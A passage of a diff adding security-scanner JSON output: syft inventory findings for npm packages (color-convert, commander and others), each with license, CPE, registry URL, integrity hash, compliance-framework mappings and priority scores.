], + "purl": "pkg:npm/cluster-key-slot@1.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/cluster-key-slot/-/cluster-key-slot-1.1.2.tgz", + "integrity": "sha512-RMr0FhtfXemyinomL4hrWcYJxmX6deFdCxpJzhDttxgO1+bcCnkk+9drydLVDmAMG7NE6aN/fl4F7ucU/90gAA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "56e4289efb51aa13", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: color-convert 2.0.1", + "title": "color-convert 2.0.1", + "description": "Package discovered: color-convert 2.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "fcc3d45495abf3bd", + "name": "color-convert", + "version": "2.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:color-convert:color-convert:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color-convert:color_convert:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color_convert:color-convert:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color_convert:color_convert:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color:color-convert:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color:color_convert:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/color-convert@2.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dependencies": { + "color-name": "~1.1.4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "568b6e4207edec50", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: color-name 1.1.4", + "title": "color-name 1.1.4", + "description": "Package discovered: color-name 1.1.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9d8d6c4ccfd91cbf", + "name": "color-name", + "version": "1.1.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:color-name:color-name:1.1.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color-name:color_name:1.1.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color_name:color-name:1.1.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color_name:color_name:1.1.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color:color-name:1.1.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color:color_name:1.1.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/color-name@1.1.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c5d023023358f691", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: color-name 2.1.0", + "title": "color-name 2.1.0", + "description": "Package discovered: color-name 2.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8dfa4f08fc1899a7", + "name": "color-name", + "version": "2.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:color-name:color-name:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color-name:color_name:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color_name:color-name:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color_name:color_name:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color:color-name:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:color:color_name:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/color-name@2.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/color-name/-/color-name-2.1.0.tgz", + "integrity": "sha512-1bPaDNFm0axzE4MEAzKPuqKWeRaT43U/hyxKPBdqTfmPF+d6n7FSoTFxLVULUJOmiLp01KjhIPPH+HrXZJN4Rg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d0d3f9cc2cfd641a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: color-string 1.9.1", + "title": "color-string 1.9.1", + "description": "Package discovered: color-string 1.9.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b96884f4eed4192d", + "name": "color-string", + "version": "1.9.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:color-string_project:color-string:1.9.1:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/color-string@1.9.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/color-string/-/color-string-1.9.1.tgz", + "integrity": "sha512-shrVawQFojnZv6xM40anx4CkoDP+fZsw/ZerEMsW/pyzsRbElpsL/DBVW7q3ExxwusdNXI3lXpuhEZkzs8p5Eg==", + "dependencies": { + "color-name": "^1.0.0", + "simple-swizzle": "^0.2.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b8edaba313b178d2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: color-string 2.1.4", + "title": "color-string 2.1.4", + "description": "Package discovered: color-string 2.1.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1f15e4f4433605fc", + "name": "color-string", + "version": "2.1.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:color-string_project:color-string:2.1.4:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/color-string@2.1.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/color-string/-/color-string-2.1.4.tgz", + "integrity": "sha512-Bb6Cq8oq0IjDOe8wJmi4JeNn763Xs9cfrBcaylK1tPypWzyoy2G3l90v9k64kjphl/ZJjPIShFztenRomi8WTg==", + "dependencies": { + "color-name": "^2.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "227fe4ddfe5bcfb2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: combined-stream 1.0.8", + "title": "combined-stream 1.0.8", + "description": "Package discovered: combined-stream 1.0.8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6feb2abce081a13b", + "name": "combined-stream", + "version": "1.0.8", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:combined-stream:combined-stream:1.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:combined-stream:combined_stream:1.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:combined_stream:combined-stream:1.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:combined_stream:combined_stream:1.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:combined:combined-stream:1.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:combined:combined_stream:1.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/combined-stream@1.0.8", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", + "dependencies": { + "delayed-stream": "~1.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "df1825804c4b40ea", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: commander 10.0.1", + "title": "commander 10.0.1", + "description": "Package discovered: commander 10.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "68cb0d0425b8ec71", + "name": "commander", + "version": "10.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:commander:commander:10.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/commander@10.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/commander/-/commander-10.0.1.tgz", + "integrity": "sha512-y4Mg2tXshplEbSGzx7amzPwKKOCGuoSRP/CjEdwwk0FOGlUbq6lKuoyDZTNZkmxHdJtp54hdfY/JUrdL7Xfdug==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b275a043135b9b63", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: commander 4.1.1", + "title": "commander 4.1.1", + "description": "Package discovered: commander 4.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6ef23c8bf6c64c11", + "name": "commander", + "version": "4.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:commander:commander:4.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/commander@4.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/commander/-/commander-4.1.1.tgz", + "integrity": "sha512-NOKm8xhkzAjzFx8B2v5OAHT+u5pRQc2UCa2Vq9jYL/31o2wi9mxBA7LIFs3sV5VSC49z6pEhfbMULvShKj26WA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "af21f9856150d16c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: concat-stream 1.6.2", + "title": "concat-stream 1.6.2", + "description": "Package discovered: concat-stream 1.6.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": 